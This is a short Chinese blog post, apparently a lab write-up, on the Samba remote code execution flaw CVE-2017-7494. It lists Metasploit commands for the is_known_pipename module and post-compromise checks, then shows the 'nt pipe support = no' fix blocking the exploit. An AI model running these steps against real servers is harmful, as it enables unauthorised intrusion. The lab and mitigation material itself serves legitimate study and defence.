linux smb 漏洞_(CVE-2017-7494)Samba远程代码执行[Linux]

该博客介绍了针对开启共享的Samba服务的漏洞利用情况,通过msfconsole进行攻击尝试。然而,通过在靶机上编辑smb.conf禁用ntpipesupport并重启服务后,漏洞利用尝试失败,因为这阻止了Windows客户端的共享列表,从而防止了攻击成功。解决方案在于正确配置Samba服务,增强系统安全性。
摘要由CSDN通过智能技术生成

简介

此漏洞是针对开启了共享的smb服务

漏洞利用

启动msfconsole

search is_known_pipename     搜索此模块

use exploit/linux/samba/is_known_pipename 调用此模块

配置目标靶机IP地址,配置目标靶机文件共享名

rexploit   运行

查看靶机信息   id  whoam   cat /proc/version

拿到目标后可以进行提权了

解决漏洞方案

在靶机上编辑Samba服务配置文件smb.config

vim /etc/samba/smb.conf

在第76行添加   nt pipe support = no

service smb restart 重启smb服务,然后回到渗透机上,重新使用溢出模块对靶机的smb服务进行溢出操作,使用命令rexploit

此时发现利用脚本给出的操作提示:

] 172.16.1.29:445-No suitable share and path were found, try setting SMB_SHARE_NAME

and SMB_FOLDER

//没有找到合适的共享和路径,尝试设置Smb_Share_Name和SMB_FOLDER

由于我们关闭了pipe support会禁用 Windows 客户端的共享列表。所以此处漏洞无法成功进行利用

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值